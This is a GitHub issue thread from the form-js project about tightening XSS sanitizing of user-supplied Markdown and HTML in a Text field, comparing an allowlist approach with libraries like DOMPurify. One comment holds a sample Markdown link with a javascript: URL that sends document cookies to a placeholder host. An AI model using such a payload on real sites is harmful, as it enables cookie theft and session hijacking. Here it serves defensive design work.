### ISSUE TITLE
Improve HTML sanitizing on user-provided `Text`

### ISSUE THREAD

**Issue by nikku** [bpmn-io/form-js#107]
__What should we do?__

Given the huge amount of potential [XSS holes](https://owasp.org/www-community/xss-filter-evasion-cheatsheet) we should double check our XSS prevention strategy related to the `Text` field.

Two alternatives exists from my point of view:

* Strictly whitelist allowed HTML elements _and_ attributes so that we get XSS holes under control
* Use a fully featured XSS sanitizer, i.e. [DOMPurify](https://github.com/cure53/DOMPurify) or [js-xss](https://github.com/leizongmin/js-xss) to parse anything the user throws at us.

__Why should we do it?__

It remains fairly easy to come up with quirky behavior that tricks our existing sanitation, cf. https://github.com/bpmn-io/form-js/issues/102.

**Comment by nikku** [comment]
CC @barmac @philippfromme

**Comment by barmac** [comment]
As discussed, I support the second option as this allows us to focus on further development of the library without neglecting security.

**Comment by nikku** [comment]
Whatever option we go for DOMPurify has a great [example of a big bad HTML file](https://cure53.de/purify).

**Comment by andreasgeier** [comment]
From my point of view, markdown was the requirement for the text component. HTML support is just there because we use snarkdown, isn't it? If HTML is not a requirement from PM, removing the support at all could be an option.

**Comment by nikku** [comment]
Thanks for the comment @andreasgeier.

From the accessibility it does make a lot of sense to support both, basic HTML _and_ markdown, as some users may not understand markdown yet. Where our markdown support is limited basic HTML is also an escape latch.

Under the hood markdown is converted to HTML. So whatever we do we do need to sanitize the resulting HTML. This is _by design_. 

Hope that clarifies things.

**Comment by nikku** [comment]
To provide a tangible example:

Users may easily provide malicious content via Markdown alone, i.e. steal your cookies if you click a link: 

```markdown
[Get help](javascript:fetch('badurl', { body: JSON.stringify(document.cookies) }))
```

**Comment by philippfromme** [comment]
👍🏻 for having a defined list of allowed tags and attributes. I don't see a use case beyond plain text, links and maybe images. I'd rather keep the Markdown form field focused and avoid pulling another library we don't control. If a user really needs a more powerful form field they can always (or rather in the near future should be able to) create an extension.
